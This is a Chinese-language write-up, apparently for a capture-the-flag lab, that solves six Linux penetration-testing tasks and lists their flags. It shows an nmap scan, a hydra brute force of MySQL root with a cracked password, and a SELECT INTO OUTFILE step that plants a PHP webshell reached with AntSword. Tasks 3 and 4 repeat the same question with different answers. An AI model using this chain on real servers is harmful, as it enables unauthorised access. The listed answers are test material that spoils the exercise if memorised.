Linux 操作系统渗透测试
Linux 操作系统渗透测试
1.通过Kali对服务器场景Linux进行操作系统扫描渗透测试,并将该操作显示结果“OS Details:”之后的字符串作为Flag提交;

nmap -A -Pn -T5 172.16.102.250
扫描目标地址即可得到
Flag:Linux 2.6.32 - 3.10
2.通过Kali对服务器场景Linux进行系统服务及版本扫描渗透测试,并将该操作显示结果中MySQL数据库对应的服务版本信息字符串作为Flag提交;

nmap -A -Pn -T5 172.16.102.250
扫描即可得出
Flag: MySQL 5.1.73-log
3.通过Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件名称作为Flag提交;

hydra -l root -P /root/200.txt mysql://172.16.102.250
由上题可以得知他数据库的版本5.1.73 这个低版本的数据库是可以通过数据库写码的
通过hydra爆破出他数据库的账号密码 root 3112ab
mysql -h 172.16.102.250 -u root -p

登录数据库
select ““into outfile “/var/www/html/123.php”
写入一句话木马

通过蚁剑连接一句话木马
找到文件
Flag: loginmanager
4.通过Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件名称作为Flag提交;

Flag: slkrvung
5.通过Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp文件的文件名称作为Flag提交;

Flag: vmifeo
6.通过Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag提交。

Flag: glamorous
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 ruochen!
评论
ValineDisqus

